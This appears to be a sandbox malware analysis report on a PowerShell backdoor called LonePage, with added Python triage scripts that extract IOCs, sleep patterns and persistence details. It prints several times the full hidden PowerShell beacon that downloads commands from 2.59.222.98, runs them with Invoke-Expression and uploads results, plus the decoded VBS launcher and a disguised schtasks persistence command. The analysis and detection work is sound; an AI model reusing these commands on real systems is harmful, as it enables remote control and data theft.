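LONG_SLEEP_MS = 3 * 60 * 1000
NOTABLE_SLEEP_MS = 30_000

# Delay values of one powershell.exe instance, copied in order from the report
# (constructed test input for this example).
PAGE_DELAYS_MS = (
    922337203685477, 922337203685477, 922337203685477,
    600000, 599890, 599781, 599672, 599562, 599453, 599343, 599234,
    599125, 599015, 598906, 598797, 598687, 598577, 598468,
    922337203685477,
)

# A few report lines in the report's own wording (constructed test input).
SAMPLE_LINES = """\
Source: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe TID: 4068 | Thread sleep time: -5534023222112862s >= -30000s
Source: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe TID: 7444 | Thread sleep time: -600000s >= -30000s
Source: C:\\Windows\\System32\\svchost.exe TID: 7648 | Thread sleep time: -30000s >= -30000s
Source: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe | Thread delayed: delay time: 922337203685477
Source: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe | Window / User API: threadDelayed 3389
"""

# Image name, optional thread id, then whichever of the three delay phrasings the
# report uses on that line.
DELAY_RE = re.compile(
    r"(?P<image>[\w.-]+\.exe)(?:\s+TID:\s*(?P<tid>\d+))?.*?"
    r"(?:delay time:\s*(?P<delay>\d+)|sleep time:\s*-(?P<sleep>\d+)s|threadDelayed\s+(?P<api>\d+))",
    re.IGNORECASE,
)


def classify(ms: int) -> str:
    """Label one delay value the way an analyst reading the report would."""
    if ms and ms % TIMESPAN_MAX_MS == 0:
        n = ms // TIMESPAN_MAX_MS
        return "infinite-wait" if n == 1 else f"infinite-wait x{n}"
    if ms >= LONG_SLEEP_MS:
        return "long-sleep"
    if ms >= NOTABLE_SLEEP_MS:
        return "sleep>=30s"
    return "short"


def find_countdowns(values, max_step_ms=1000, min_len=3):
    """Runs of strictly decreasing values with steps of at most max_step_ms: the shape
    of one timeout being re-armed with its remaining time, not of N separate sleeps."""
    runs, start = [], 0
    for i in range(1, len(values) + 1):
        if i == len(values) or not 0 < values[i - 1] - values[i] <= max_step_ms:
            if i - start >= min_len:
                runs.append((values[start], values[i - 1], i - start))
            start = i
    return runs


def parse_delays(text: str) -> list:
    """One dict per recognised report line."""
    events = []
    for line in text.splitlines():
        m = DELAY_RE.search(line)
        if not m:
            continue
        ms = int(m.group("delay") or m.group("sleep") or m.group("api"))
        events.append({"image": m.group("image"), "tid": m.group("tid"),
                       "ms": ms, "kind": classify(ms)})
    return events


def summarize(values):
    """Collapse a delay list into what matters for the verdict: how many values are
    .NET infinite waits, which runs are one re-armed timeout, and the longest real wait."""
    kinds = {}
    for v in values:
        kinds[classify(v)] = kinds.get(classify(v), 0) + 1
    finite = [v for v in values if v % TIMESPAN_MAX_MS]
    return {"kinds": kinds, "countdowns": find_countdowns(list(values)),
            "longest_finite_ms": max(finite, default=0)}


if __name__ == "__main__":
    print(summarize(PAGE_DELAYS_MS))
    for event in parse_delays(SAMPLE_LINES):
        print(event)
```

On the powershell.exe values listed above the summary comes out as four infinite waits, one 15-step countdown from 600000 to 598468 ms and a longest finite wait of 10 minutes; the only delays the script itself asks for are the Start-Sleep calls in its command line, which are all under a minute.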

              HIPS / PFW / Operating System Protection Evasion

Source: C:\Windows\System32\wscript.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -executionpolicy bypass -w hidden -noprofile -c start-sleep 39;start-sleep (get-random -min 5 -max 43);start-sleep 11;$iik=new-object net.webclient;$flm=$iik.downloaddata('http://2.59.222.98:43820/KfngnHbxFHjaucie/page107/upgrade.txt');if($flm.Length -gt 1){$jkr=[system.text.encoding]::utf8.getString($flm);if($jkr -match 'get-content'){[byte[]] $drpy=IEX $jkr;}else{$bjdo=whoami;$bjdo+='==';$bjdo+=[System.Net.Dns]::GetHostAddresses($ip)+[System.Environment]::NewLine;$hbn=IEX $jkr;$bjdo+=$hbn|Out-string;[byte[]]$drpy=[system.text.encoding]::Utf8.GetBytes($bjdo);};start-sleep 10;$ujk=new-object net.webclient;start-sleep 16;$ujk.uploaddata('http://2.59.222.98:28402/page107',$drpy);}
Source: unknown | Process created: Base64 decoded (the dropped VBS launcher, line breaks restored; the leading bytes are decoding residue as shown in the report):
    o+^j]jv.dim r, c
    set r = createobject("WScript.Shell")
    c = "powershell.exe -executionpolicy bypass -w hidden -noprofile -c start-sleep 39;start-sleep (get-random -min 5 -max 43);start-sleep 11;$iik=new-object net.webclient;$flm=$iik.downloaddata('http://2.59.222.98:43820/KfngnHbxFHjaucie/page107/upgrade.txt');if($flm.Length -gt 1){$jkr=[system.text.encoding]::utf8.getString($flm);if($jkr -match 'get-content'){[byte[]] $drpy=IEX $jkr;}else{$bjdo=whoami;$bjdo+='==';$bjdo+=[System.Net.Dns]::GetHostAddresses($ip)+[System.Environment]::NewLine;$hbn=IEX $jkr;$bjdo+=$hbn|Out-string;[byte[]]$drpy=[system.text.encoding]::Utf8.GetBytes($bjdo);};start-sleep 10;$ujk=new-object net.webclient;start-sleep 16;$ujk.uploaddata('http://2.59.222.98:28402/page107',$drpy);}"
    r.Run c, 0, false
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe" "C:\Users\user\appdata\local\temp\document.pdf"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\schtasks.exe "C:\Windows\system32\schtasks.exe" /create /TN OneDriveCoreTask-S-1-5-21-5466262771-899953646639-1001 /SC minute /mo 4 /tr C:\Users\Public\Libraries\Recorded.vbs /f
Source: C:\Windows\System32\wscript.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -executionpolicy bypass -w hidden -noprofile -c start-sleep 39;start-sleep (get-random -min 5 -max 43);start-sleep 11;$iik=new-object net.webclient;$flm=$iik.downloaddata('http://2.59.222.98:43820/KfngnHbxFHjaucie/page107/upgrade.txt');if($flm.Length -gt 1){$jkr=[system.text.encoding]::utf8.getString($flm);if($jkr -match 'get-content'){[byte[]] $drpy=IEX $jkr;}else{$bjdo=whoami;$bjdo+='==';$bjdo+=[System.Net.Dns]::GetHostAddresses($ip)+[System.Environment]::NewLine;$hbn=IEX $jkr;$bjdo+=$hbn|Out-string;[byte[]]$drpy=[system.text.encoding]::Utf8.GetBytes($bjdo);};start-sleep 10;$ujk=new-object net.webclient;start-sleep 16;$ujk.uploaddata('http://2.59.222.98:28402/page107',$drpy);}
Source: C:\Windows\System32\wscript.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -executionpolicy bypass -w hidden -noprofile -c start-sleep 39;start-sleep (get-random -min 5 -max 43);start-sleep 11;$iik=new-object net.webclient;$flm=$iik.downloaddata('http://2.59.222.98:43820/KfngnHbxFHjaucie/page107/upgrade.txt');if($flm.Length -gt 1){$jkr=[system.text.encoding]::utf8.getString($flm);if($jkr -match 'get-content'){[byte[]] $drpy=IEX $jkr;}else{$bjdo=whoami;$bjdo+='==';$bjdo+=[System.Net.Dns]::GetHostAddresses($ip)+[System.Environment]::NewLine;$hbn=IEX $jkr;$bjdo+=$hbn|Out-string;[byte[]]$drpy=[system.text.encoding]::Utf8.GetBytes($bjdo);};start-sleep 10;$ujk=new-object net.webclient;start-sleep 16;$ujk.uploaddata('http://2.59.222.98:28402/page107',$drpy);}
Source: unknown | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -w hidden -nop -noni -exec bypass -c $temp='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
Source: C:\Windows\System32\wscript.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -executionpolicy bypass -w hidden -noprofile -c start-sleep 39;start-sleep (get-random -min 5 -max 43);start-sleep 11;$iik=new-object net.webclient;$flm=$iik.downloaddata('http://2.59.222.98:43820/kfngnhbxfhjaucie/page107/upgrade.txt');if($flm.length -gt 1){$jkr=[system.text.encoding]::utf8.getstring($flm);if($jkr -match 'get-content'){[byte[]] $drpy=iex $jkr;}else{$bjdo=whoami;$bjdo+='==';$bjdo+=[system.net.dns]::gethostaddresses($ip)+[system.environment]::newline;$hbn=iex $jkr;$bjdo+=$hbn|out-string;[byte[]]$drpy=[system.text.encoding]::utf8.getbytes($bjdo);};start-sleep 10;$ujk=new-object net.webclient;start-sleep 16;$ujk.uploaddata('http://2.59.222.98:28402/page107',$drpy);}
Source: C:\Windows\System32\wscript.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -executionpolicy bypass -w hidden -noprofile -c start-sleep 39;start-sleep (get-random -min 5 -max 43);start-sleep 11;$iik=new-object net.webclient;$flm=$iik.downloaddata('http://2.59.222.98:43820/kfngnhbxfhjaucie/page107/upgrade.txt');if($flm.length -gt 1){$jkr=[system.text.encoding]::utf8.getstring($flm);if($jkr -match 'get-content'){[byte[]] $drpy=iex $jkr;}else{$bjdo=whoami;$bjdo+='==';$bjdo+=[system.net.dns]::gethostaddresses($ip)+[system.environment]::newline;$hbn=iex $jkr;$bjdo+=$hbn|out-string;[byte[]]$drpy=[system.text.encoding]::utf8.getbytes($bjdo);};start-sleep 10;$ujk=new-object net.webclient;start-sleep 16;$ujk.uploaddata('http://2.59.222.98:28402/page107',$drpy);}
Source: C:\Windows\System32\wscript.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -executionpolicy bypass -w hidden -noprofile -c start-sleep 39;start-sleep (get-random -min 5 -max 43);start-sleep 11;$iik=new-object net.webclient;$flm=$iik.downloaddata('http://2.59.222.98:43820/kfngnhbxfhjaucie/page107/upgrade.txt');if($flm.length -gt 1){$jkr=[system.text.encoding]::utf8.getstring($flm);if($jkr -match 'get-content'){[byte[]] $drpy=iex $jkr;}else{$bjdo=whoami;$bjdo+='==';$bjdo+=[system.net.dns]::gethostaddresses($ip)+[system.environment]::newline;$hbn=iex $jkr;$bjdo+=$hbn|out-string;[byte[]]$drpy=[system.text.encoding]::utf8.getbytes($bjdo);};start-sleep 10;$ujk=new-object net.webclient;start-sleep 16;$ujk.uploaddata('http://2.59.222.98:28402/page107',$drpy);}
Source: C:\Windows\System32\wscript.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -executionpolicy bypass -w hidden -noprofile -c start-sleep 39;start-sleep (get-random -min 5 -max 43);start-sleep 11;$iik=new-object net.webclient;$flm=$iik.downloaddata('http://2.59.222.98:43820/kfngnhbxfhjaucie/page107/upgrade.txt');if($flm.length -gt 1){$jkr=[system.text.encoding]::utf8.getstring($flm);if($jkr -match 'get-content'){[byte[]] $drpy=iex $jkr;}else{$bjdo=whoami;$bjdo+='==';$bjdo+=[system.net.dns]::gethostaddresses($ip)+[system.environment]::newline;$hbn=iex $jkr;$bjdo+=$hbn|out-string;[byte[]]$drpy=[system.text.encoding]::utf8.getbytes($bjdo);};start-sleep 10;$ujk=new-object net.webclient;start-sleep 16;$ujk.uploaddata('http://2.59.222.98:28402/page107',$drpy);}
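Read end to end, the command line above is the whole LonePage tasking loop. It sleeps 39 s, a random 5 to 42 s (Get-Random's -max is exclusive) and 11 s more, then fetches http://2.59.222.98:43820/KfngnHbxFHjaucie/page107/upgrade.txt. If the body mentions get-content it is run with Invoke-Expression and the output is treated as raw bytes (a file read); otherwise it is run and the output is prefixed with whoami, '==' and the host's addresses ($ip is never assigned, PowerShell hands the string parameter an empty string, and Dns.GetHostAddresses of an empty string returns the local host's addresses). After 10 s and 16 s more the result is POSTed with WebClient.UploadData to http://2.59.222.98:28402/page107. Worst case that is 118 s per run, inside the 4-minute schtasks interval, so runs do not overlap. The script below is an added example, not code from the report: it deduplicates the command lines case-insensitively (the later entries are the same command logged in lowercase), extracts C2 hosts and ports, flags non-standard ports, matches the parameter prefixes PowerShell accepts (-w, -nop, -noni, -exec) rather than full switch names, computes the beacon window and parses the schtasks persistence command. The regexes and labels are my own.

```python
import re
from urllib.parse import urlparse

# The tasking command line from the process-creation entries above (constructed test
# input, copied from the report; the report logs later runs of it in lowercase).
LONE_PAGE_CMD = (
    r'"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -executionpolicy bypass -w hidden '
    r"-noprofile -c start-sleep 39;start-sleep (get-random -min 5 -max 43);start-sleep 11;"
    r"$iik=new-object net.webclient;"
    r"$flm=$iik.downloaddata('http://2.59.222.98:43820/KfngnHbxFHjaucie/page107/upgrade.txt');"
    r"if($flm.Length -gt 1){$jkr=[system.text.encoding]::utf8.getString($flm);"
    r"if($jkr -match 'get-content'){[byte[]] $drpy=IEX $jkr;}"
    r"else{$bjdo=whoami;$bjdo+='==';$bjdo+=[System.Net.Dns]::GetHostAddresses($ip)+[System.Environment]::NewLine;"
    r"$hbn=IEX $jkr;$bjdo+=$hbn|Out-string;[byte[]]$drpy=[system.text.encoding]::Utf8.GetBytes($bjdo);};"
    r"start-sleep 10;$ujk=new-object net.webclient;start-sleep 16;"
    r"$ujk.uploaddata('http://2.59.222.98:28402/page107',$drpy);}"
)
SCHTASKS_CMD = (
    r'"C:\Windows\system32\schtasks.exe" /create /TN OneDriveCoreTask-S-1-5-21-5466262771-899953646639-1001 '
    r"/SC minute /mo 4 /tr C:\Users\Public\Libraries\Recorded.vbs /f"
)
CMDLINES = [LONE_PAGE_CMD, LONE_PAGE_CMD.lower(), SCHTASKS_CMD]

URL_RE = re.compile(r"https?://[^\s'\")]+", re.IGNORECASE)
FIXED_SLEEP_RE = re.compile(r"start-sleep\s+(\d+)", re.IGNORECASE)
JITTER_RE = re.compile(r"start-sleep\s+\(get-random\s+-min\w*\s+(\d+)\s+-max\w*\s+(\d+)\)", re.IGNORECASE)

# PowerShell accepts any unambiguous prefix of a parameter name, so -w, -nop, -noni
# and -exec (all present in the report) must be matched as prefixes, not exact switches.
EVASION = {
    "execution policy bypass": r"-e[px][a-z]*\s+bypass",
    "hidden window": r"-w[a-z]*\s+hidden",
    "no profile": r"-nop[a-z]*\b",
    "non-interactive": r"-noni[a-z]*\b",
    "Invoke-Expression of fetched text": r"\biex\b|invoke-expression",
    "WebClient download": r"\.download(?:data|string|file)\(",
    "WebClient upload": r"\.upload(?:data|string|values|file)\(",
}


def normalize(cmd: str) -> str:
    """Case- and whitespace-insensitive key, so the lowercased log copies collapse."""
    return re.sub(r"\s+", " ", cmd.strip()).lower()


def beacon_delay_bounds(cmd: str):
    """Seconds from task start to upload: fixed Start-Sleep values plus the Get-Random
    range; Get-Random's -Maximum is exclusive, so the top of the range is max - 1."""
    low = high = sum(int(s) for s in FIXED_SLEEP_RE.findall(cmd))
    for lo, hi in JITTER_RE.findall(cmd):
        low, high = low + int(lo), high + int(hi) - 1
    return low, high


def parse_schtasks(cmd: str):
    """Name, schedule and action of a 'schtasks /create' command, else None."""
    if not re.search(r'schtasks(?:\.exe)?"?\s+/create\b', cmd, re.IGNORECASE):
        return None

    def opt(flag):
        m = re.search(rf"/{flag}\s+(\S+)", cmd, re.IGNORECASE)
        return m.group(1) if m else None

    return {"name": opt("tn"), "schedule": opt("sc"), "interval": int(opt("mo") or 1),
            "action": opt("tr"), "force": bool(re.search(r"\s/f\b", cmd, re.IGNORECASE))}


def triage(cmdlines):
    """IOCs, evasion flags, beacon window and persistence from a list of command lines."""
    seen = set()
    out = {"unique_cmdlines": 0, "c2_hosts": set(), "c2_ports": set(),
           "nonstandard_ports": set(), "evasion": set(), "tasks": [], "beacon_delay_s": None}
    for cmd in cmdlines:
        key = normalize(cmd)
        if key in seen:
            continue
        seen.add(key)
        out["unique_cmdlines"] += 1
        for url in URL_RE.findall(cmd):
            u = urlparse(url)
            out["c2_hosts"].add(u.hostname)
            if u.port:
                out["c2_ports"].add(u.port)
                if u.port not in (80, 443):
                    out["nonstandard_ports"].add(u.port)
        out["evasion"].update(label for label, pat in EVASION.items()
                              if re.search(pat, cmd, re.IGNORECASE))
        if FIXED_SLEEP_RE.search(cmd):
            out["beacon_delay_s"] = beacon_delay_bounds(cmd)
        task = parse_schtasks(cmd)
        if task:
            out["tasks"].append(task)
    return out


if __name__ == "__main__":
    for key, value in triage(CMDLINES).items():
        print(f"{key}: {value}")
```

Against the three command lines this yields two unique commands, the single C2 host 2.59.222.98 on the two non-standard ports 43820 and 28402, a beacon window of 81 to 118 s, and the 4-minute task OneDriveCoreTask-S-1-5-21-5466262771-899953646639-1001 running C:\Users\Public\Libraries\Recorded.vbs. The same host, port pair and task name are what to pivot on in proxy logs and in the Task Scheduler event log.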
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\svchost.exe | Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
Source: C:\Windows\System32\svchost.exe | Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
Source: C:\Windows\System32\svchost.exe | Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
Source: C:\Windows\System32\svchost.exe | Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
Source: C:\Windows\System32\svchost.exe | Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
Source: C:\Windows\System32\svchost.exe | Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
Source: C:\Windows\System32\svchost.exe | Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
Source: C:\Windows\System32\svchost.exe | Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
Source: C:\Windows\System32\svchost.exe | Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm VolumeInformation
Source: C:\Windows\System32\svchost.exe | Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
Source: C:\Windows\System32\svchost.exe | Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
Source: C:\Windows\System32\svchost.exe | Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\svchost.exe | Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\svchost.exe | Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
Source: C:\Windows\System32\svchost.exe | Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
Source: C:\Windows\System32\svchost.exe | Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\wscript.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

              Stealing of Sensitive Information

Source: Yara match | File source: 00000010.00000002.4545241066.00000107F6460000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000F.00000002.4358131758.00000245D7680000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000F.00000002.4358131758.00000245D7686000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000F.00000002.4358131758.00000245D76C5000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000006.00000002.3475796002.000001DE79AE7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.2066672979.0000026B63953000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000005.00000002.2085530098.0000018899B05000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000F.00000002.4358273831.00000245D7825000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000005.00000002.2085268300.000001889994C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.2066672979.0000026B639B6000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000F.00000002.4358131758.00000245D76DF000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000005.00000002.2085268300.0000018899957000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000005.00000002.2085268300.0000018899997000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000010.00000002.4545241066.00000107F64F2000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000006.00000002.3415629273.000001DE5F7E0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000006.00000002.3417701270.000001DE613B1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000010.00000002.4521422067.0000010780085000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000010.00000002.4521422067.000001078019C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000006.00000002.3417701270.000001DE62CF0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: powershell.exe PID: 6496, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: wscript.exe PID: 7272, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: powershell.exe PID: 7332, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: wscript.exe PID: 4796, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: powershell.exe PID: 5244, type: MEMORYSTR
Source: Yara match | File source: C:\Users\Public\Libraries\Recorded.vbs, type: DROPPED

              Remote Access Functionality

Source: Yara match | File source: 00000010.00000002.4545241066.00000107F6460000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000F.00000002.4358131758.00000245D7680000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000F.00000002.4358131758.00000245D7686000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000F.00000002.4358131758.00000245D76C5000.00000004.00000020.00020000.00000000.sd
mp, type: MEMORY
Source: Yara match | File source: 00000006.00000002.3475796002.000001DE79AE7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.2066672979.0000026B63953000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000005.00000002.2085530098.0000018899B05000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000F.00000002.4358273831.00000245D7825000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000005.00000002.2085268300.000001889994C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.2066672979.0000026B639B6000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000F.00000002.4358131758.00000245D76DF000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000005.00000002.2085268300.0000018899957000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000005.00000002.2085268300.0000018899997000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000010.00000002.4545241066.00000107F64F2000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000006.00000002.3415629273.000001DE5F7E0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000006.00000002.3417701270.000001DE613B1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
